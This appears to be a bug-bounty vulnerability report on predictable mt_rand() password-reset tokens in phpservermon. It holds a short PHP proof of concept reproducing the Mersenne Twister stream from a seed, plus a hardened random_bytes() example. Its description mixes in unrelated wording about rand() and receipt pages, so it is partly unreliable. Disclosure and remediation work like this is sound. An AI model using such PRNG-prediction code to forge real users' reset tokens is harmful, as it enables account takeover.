Use of Predictable Algorithm in Random Number Generator in phpservermon/phpservermon
Reported on Jun 23rd 2021
✍️ Description
The random number generator implemented by mt_rand() cannot withstand a cryptographic attack. Insecure randomness errors occur when a function that can produce predictable values is used as a source of randomness in a security-sensitive context.

In this case the function that generates weak random numbers is mt_rand() in /psm/Service/User.php at line 394.
This code uses the rand() function to generate "unique" identifiers for the receipt pages it generates. Because rand() is a statistical PRNG, it is easy for an attacker to guess the strings it generates. Although the underlying design of the receipt system is also faulty, it would be more secure if it used a random number generator that did not produce predictable receipt identifiers, such as a cryptographic PRNG.
🕵️‍♂️ Proof of Concept
**POC.php**
```php
#!/usr/bin/env php
<?php
// PoC: once the seed is known, the mt_rand() stream is fully reproducible.
// Prints the <offset>-th output and the output 227 calls later; the two are
// linked by the Mersenne Twister recurrence, which is what lets an observer
// recover the stream from a handful of leaked values.
if ($argc < 3) {
    print($argv[0] . ' <seed> <offset>' . "\n");
    print('' . "\n");
    print('Parameters:' . "\n");
    print('  seed:   Seed to initialize mt_rand() with' . "\n");
    print('  offset: Number of calls to mt_rand() before printing the first');
    print(' output' . "\n");
    print('' . "\n");
    print('Output:' . "\n");
    print('  <offset>\'s call to mt_rand() and <offset+227>\'s call');
    print(' to mt_rand()' . "\n");
    exit(1);
}

$seed   = (int) $argv[1];
$offset = (int) $argv[2];

mt_srand($seed);
// Discard the first <offset> outputs.
for ($i = 0; $i < $offset; $i++) {
    mt_rand();
}
print mt_rand() . " ";
// Skip 226 more so the next value is exactly 227 calls after the first.
for ($i = 0; $i < 226; $i++) {
    mt_rand();
}
print mt_rand() . "\n";
```
💥 Impact
By exploiting this vulnerability, an attacker will be able to produce or guess the password reset hashes of any user.
🕵️‍♂️ Solution
When unpredictability is critical, as is the case with most security-sensitive uses of randomness, use a cryptographic PRNG. Regardless of the PRNG you choose, always use a value with sufficient entropy to seed the algorithm. (Values such as the current time offer only negligible entropy and should not be used.)
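As an added example (not phpservermon's code, and not the actual contents of /psm/Service/User.php), the following shows a constructed reset-token generator in the weak mt_rand() style beside a hardened version built on PHP's CSPRNG. The function names `weakResetToken`, `secureResetToken` and `tokenMatches` are hypothetical; `random_bytes()`, `bin2hex()` and `hash_equals()` are standard PHP functions.

```php
<?php
declare(strict_types=1);

// Added example (not the project's code): weak vs. hardened reset tokens.

/**
 * Weak: mt_rand() is a Mersenne Twister PRNG. Its internal state can be
 * reconstructed from a small number of observed outputs, so every token
 * derived from it is predictable. Hashing the value does not help, since
 * the input space is tiny once the state is known. Shown only to
 * illustrate the pattern this report describes.
 */
function weakResetToken(): string
{
    return sha1((string) mt_rand());
}

/**
 * Hardened: random_bytes() draws from the operating system CSPRNG
 * (getrandom(2), /dev/urandom or the Windows equivalent). 32 bytes give
 * 256 bits of entropy, no seeding is required, and it throws instead of
 * silently returning weak data if no secure source is available.
 */
function secureResetToken(int $bytes = 32): string
{
    return bin2hex(random_bytes($bytes));
}

/**
 * Compare a presented token with the stored one in constant time, so the
 * comparison itself does not leak how many leading characters matched.
 */
function tokenMatches(string $stored, string $presented): bool
{
    return hash_equals($stored, $presented);
}

// Minimal self-check when run from the command line.
if (PHP_SAPI === 'cli') {
    printf("weak token   (mt_rand):      %s\n", weakResetToken());
    $token = secureResetToken();
    printf("strong token (random_bytes): %s\n", $token);
    var_dump(strlen($token) === 64);                 // 32 bytes hex-encoded
    var_dump(tokenMatches($token, $token));          // same token accepted
    var_dump(tokenMatches($token, secureResetToken())); // fresh token rejected
}
```

Where an integer in a range is needed rather than a byte string, `random_int()` is the CSPRNG-backed counterpart of `mt_rand()`. Regardless of how the token is generated, comparing it with `hash_equals()` instead of `==` avoids turning the check into a timing oracle.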
Thank you for finding 🙏! There are no reports from users that this vulnerability has been used. Fixing it before someone does use it.